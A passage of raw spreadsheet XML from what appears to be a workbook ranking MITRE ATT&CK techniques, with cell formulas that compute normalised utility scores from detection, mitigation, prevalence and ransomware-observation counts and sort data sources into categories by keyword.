        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS53" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT53" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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4" spans="1:47" ht="34">
      <c r="A54" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B54" s="37">
        <f t="shared" si="0"/>
        <v>20.100000000000001</v>
      </c>
      <c r="C54" s="37" t="s">
        <v>3775</v>
      </c>
      <c r="D54" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E54" s="37" t="s">
        <v>3776</v>
      </c>
      <c r="F54" s="37">
        <v>1</v>
      </c>
      <c r="G54" s="37">
        <v>1</v>
      </c>
      <c r="H54" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I54" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J54" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K54" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L54" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M54" s="37">
        <v>0</v>
      </c>
      <c r="N54" s="56">
        <v>0</v>
      </c>
      <c r="O54" s="56">
        <v>0</v>
      </c>
      <c r="P54" s="56">
        <v>0</v>
      </c>
      <c r="Q54" s="56">
        <v>0</v>
      </c>
      <c r="R54" s="57"/>
      <c r="S54" s="57"/>
      <c r="T54" s="57"/>
      <c r="U54" s="57"/>
      <c r="V54" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W54" s="37"/>
      <c r="X54" s="37"/>
      <c r="Y54" s="37"/>
      <c r="Z54" s="37"/>
      <c r="AA54" s="37"/>
      <c r="AB54" s="37"/>
      <c r="AC54" s="37"/>
      <c r="AD54" s="50" t="s">
        <v>3777</v>
      </c>
      <c r="AE54" s="37" t="str" cm="1">
        <f t="array" ref="AE54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD54)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF54" s="37">
        <v>50</v>
      </c>
      <c r="AG54" s="37" t="str" cm="1">
        <f t="array" ref="AG54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH54" s="37">
        <v>50</v>
      </c>
      <c r="AI54" s="37" t="str" cm="1">
        <f t="array" ref="AI54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD54)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ54" s="37">
        <v>50</v>
      </c>
      <c r="AK54" s="37" t="str" cm="1">
        <f t="array" ref="AK54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL54" s="37">
        <v>50</v>
      </c>
      <c r="AM54" s="37" t="str" cm="1">
        <f t="array" ref="AM54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN54" s="37"/>
      <c r="AO54" s="37"/>
      <c r="AP54" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ54" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.7</v>
      </c>
      <c r="AR54" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS54" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT54" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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5" spans="1:47" ht="34">
      <c r="A55" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B55" s="37">
        <f t="shared" si="0"/>
        <v>20.5</v>
      </c>
      <c r="C55" s="37" t="s">
        <v>3778</v>
      </c>
      <c r="D55" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E55" s="37" t="s">
        <v>3779</v>
      </c>
      <c r="F55" s="37">
        <v>1</v>
      </c>
      <c r="G55" s="37">
        <v>1</v>
      </c>
      <c r="H55" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I55" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J55" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K55" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L55" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M55" s="37">
        <v>0</v>
      </c>
      <c r="N55" s="56">
        <v>0</v>
      </c>
      <c r="O55" s="56">
        <v>0</v>
      </c>
      <c r="P55" s="56">
        <v>0</v>
      </c>
      <c r="Q55" s="56">
        <v>0</v>
      </c>
      <c r="R55" s="57"/>
      <c r="S55" s="57"/>
      <c r="T55" s="57"/>
      <c r="U55" s="57"/>
      <c r="V55" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W55" s="37"/>
      <c r="X55" s="37"/>
      <c r="Y55" s="37"/>
      <c r="Z55" s="37"/>
      <c r="AA55" s="37"/>
      <c r="AB55" s="37"/>
      <c r="AC55" s="37"/>
      <c r="AD55" s="50" t="s">
        <v>3780</v>
      </c>
      <c r="AE55" s="37" t="str" cm="1">
        <f t="array" ref="AE55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF55" s="37">
        <v>51</v>
      </c>
      <c r="AG55" s="37" t="str" cm="1">
        <f t="array" ref="AG55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH55" s="37">
        <v>51</v>
      </c>
      <c r="AI55" s="37" t="str" cm="1">
        <f t="array" ref="AI55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD55)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ55" s="37">
        <v>51</v>
      </c>
      <c r="AK55" s="37" t="str" cm="1">
        <f t="array" ref="AK55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL55" s="37">
        <v>51</v>
      </c>
      <c r="AM55" s="37" t="str" cm="1">
        <f t="array" ref="AM55">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD55)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN55" s="37"/>
      <c r="AO55" s="37"/>
      <c r="AP55" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ55" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.833333333333333</v>
      </c>
      <c r="AR55" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS55" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT55" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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6" spans="1:47" ht="34">
      <c r="A56" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B56" s="37">
        <f t="shared" si="0"/>
        <v>39.809484000000005</v>
      </c>
      <c r="C56" s="37" t="s">
        <v>239</v>
      </c>
      <c r="D56" s="50" t="s">
        <v>240</v>
      </c>
      <c r="E56" s="37"/>
      <c r="F56" s="37">
        <v>1</v>
      </c>
      <c r="G56" s="37">
        <v>1</v>
      </c>
      <c r="H56" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I56" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J56" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K56" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L56" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M56" s="37">
        <v>0</v>
      </c>
      <c r="N56" s="56">
        <v>1</v>
      </c>
      <c r="O56" s="56">
        <v>0</v>
      </c>
      <c r="P56" s="56">
        <v>0</v>
      </c>
      <c r="Q56" s="56">
        <v>0</v>
      </c>
      <c r="R56" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S56" s="57">
        <v>2</v>
      </c>
      <c r="T56" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U56" s="57">
        <v>7</v>
      </c>
      <c r="V56" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.0476000000000001E-2</v>
      </c>
      <c r="W56" s="37">
        <v>9</v>
      </c>
      <c r="X56" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y56" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z56" s="37">
        <v>1</v>
      </c>
      <c r="AA56" s="37">
        <v>0.01</v>
      </c>
      <c r="AB56" s="37">
        <v>0.01</v>
      </c>
      <c r="AC56" s="37"/>
      <c r="AD56" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE56" s="37" t="str" cm="1">
        <f t="array" ref="AE56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF56" s="37">
        <v>52</v>
      </c>
      <c r="AG56" s="37" t="str" cm="1">
        <f t="array" ref="AG56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD56)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH56" s="37">
        <v>52</v>
      </c>
      <c r="AI56" s="37" t="str" cm="1">
        <f t="array" ref="AI56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ56" s="37">
        <v>52</v>
      </c>
      <c r="AK56" s="37" t="str" cm="1">
        <f t="array" ref="AK56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL56" s="37">
        <v>52</v>
      </c>
      <c r="AM56" s="37" t="str" cm="1">
        <f t="array" ref="AM56">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD56)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN56" s="37">
        <v>0</v>
      </c>
      <c r="AO56" s="37">
        <v>0</v>
      </c>
      <c r="AP56" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ56" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>13.269828000000002</v>
      </c>
      <c r="AR56" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS56" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT56" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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7" spans="1:47" ht="34">
      <c r="A57" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B57" s="37">
        <f t="shared" si="0"/>
        <v>41.585673714285718</v>
      </c>
      <c r="C57" s="37" t="s">
        <v>241</v>
      </c>
      <c r="D57" s="50" t="s">
        <v>242</v>
      </c>
      <c r="E57" s="37"/>
      <c r="F57" s="37">
        <v>1</v>
      </c>
      <c r="G57" s="37">
        <v>1</v>
      </c>
      <c r="H57" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I57" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J57" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K57" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L57" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M57" s="37">
        <v>0</v>
      </c>
      <c r="N57" s="56">
        <v>0</v>
      </c>
      <c r="O57" s="56">
        <v>2</v>
      </c>
      <c r="P57" s="56">
        <v>0</v>
      </c>
      <c r="Q57" s="56">
        <v>0</v>
      </c>
      <c r="R57" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S57" s="57">
        <v>2</v>
      </c>
      <c r="T57" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U57" s="57">
        <v>7</v>
      </c>
      <c r="V57" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.523790476190476E-2</v>
      </c>
      <c r="W57" s="37">
        <v>9</v>
      </c>
      <c r="X57" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y57" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z57" s="37">
        <v>2</v>
      </c>
      <c r="AA57" s="37">
        <v>0.02</v>
      </c>
      <c r="AB57" s="37">
        <v>0.02</v>
      </c>
      <c r="AC57" s="37"/>
      <c r="AD57" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE57" s="37" t="str" cm="1">
        <f t="array" ref="AE57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF57" s="37">
        <v>53</v>
      </c>
      <c r="AG57" s="37" t="str" cm="1">
        <f t="array" ref="AG57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD57)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH57" s="37">
        <v>53</v>
      </c>
      <c r="AI57" s="37" t="str" cm="1">
        <f t="array" ref="AI57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ57" s="37">
        <v>53</v>
      </c>
      <c r="AK57" s="37" t="str" cm="1">
        <f t="array" ref="AK57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL57" s="37">
        <v>53</v>
      </c>
      <c r="AM57" s="37" t="str" cm="1">
        <f t="array" ref="AM57">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD57)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN57" s="37">
        <v>0</v>
      </c>
      <c r="AO57" s="37">
        <v>0</v>
      </c>
      <c r="AP57" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ57" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>13.861891238095239</v>
      </c>
      <c r="AR57" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS57" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT57" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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8" spans="1:47" ht="119">
      <c r="A58" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B58" s="37">
        <f t="shared" si="0"/>
        <v>64.16757166666666</v>
      </c>
      <c r="C58" s="37" t="s">
        <v>243</v>
      </c>
      <c r="D58" s="50" t="s">
        <v>244</v>
      </c>
      <c r="E58" s="37"/>
      <c r="F58" s="37">
        <v>1</v>
      </c>
      <c r="G58" s="37">
        <v>1</v>
      </c>
      <c r="H58" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I58" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J58" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K58" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L58" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M58" s="37">
        <v>4.6500000000000003E-4</v>
      </c>
      <c r="N58" s="56">
        <v>2</v>
      </c>
      <c r="O58" s="56">
        <v>25</v>
      </c>
      <c r="P58" s="56">
        <v>4</v>
      </c>
      <c r="Q58" s="56">
        <v>10</v>
      </c>
      <c r="R58" s="57"/>
      <c r="S58" s="57">
        <v>0</v>
      </c>
      <c r="T58" s="57"/>
      <c r="U58" s="57">
        <v>0</v>
      </c>
      <c r="V58" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19523809523809521</v>
      </c>
      <c r="W58" s="37">
        <v>0</v>
      </c>
      <c r="X58" s="37">
        <v>0</v>
      </c>
      <c r="Y58" s="37">
        <v>0</v>
      </c>
      <c r="Z58" s="37">
        <v>41</v>
      </c>
      <c r="AA58" s="37">
        <v>0.41</v>
      </c>
      <c r="AB58" s="37">
        <v>0.41</v>
      </c>
      <c r="AC58" s="37"/>
      <c r="AD58" s="50" t="s">
        <v>86</v>
      </c>
      <c r="AE58" s="37" t="str" cm="1">
        <f t="array" ref="AE58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF58" s="37">
        <v>54</v>
      </c>
      <c r="AG58" s="37" t="str" cm="1">
        <f t="array" ref="AG58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH58" s="37">
        <v>54</v>
      </c>
      <c r="AI58" s="37" t="str" cm="1">
        <f t="array" ref="AI58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD58)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ58" s="37">
        <v>54</v>
      </c>
      <c r="AK58" s="37" t="str" cm="1">
        <f t="array" ref="AK58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD58)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL58" s="37">
        <v>54</v>
      </c>
      <c r="AM58" s="37" t="str" cm="1">
        <f t="array" ref="AM58">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD58)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN58" s="37">
        <v>0</v>
      </c>
      <c r="AO58" s="37">
        <v>0</v>
      </c>
      <c r="AP58" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ58" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>21.389190555555555</v>
      </c>
      <c r="AR58" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS58" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT58" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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9" spans="1:47" ht="17">
      <c r="A59" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B59" s="37">
        <f t="shared" si="0"/>
        <v>22.1</v>
      </c>
      <c r="C59" s="37" t="s">
        <v>245</v>
      </c>
      <c r="D59" s="50" t="s">
        <v>246</v>
      </c>
      <c r="E59" s="37"/>
      <c r="F59" s="37">
        <v>1</v>
      </c>
      <c r="G59" s="37">
        <v>1</v>
      </c>
      <c r="H59" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I59" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J59" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K59" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L59" s="37">
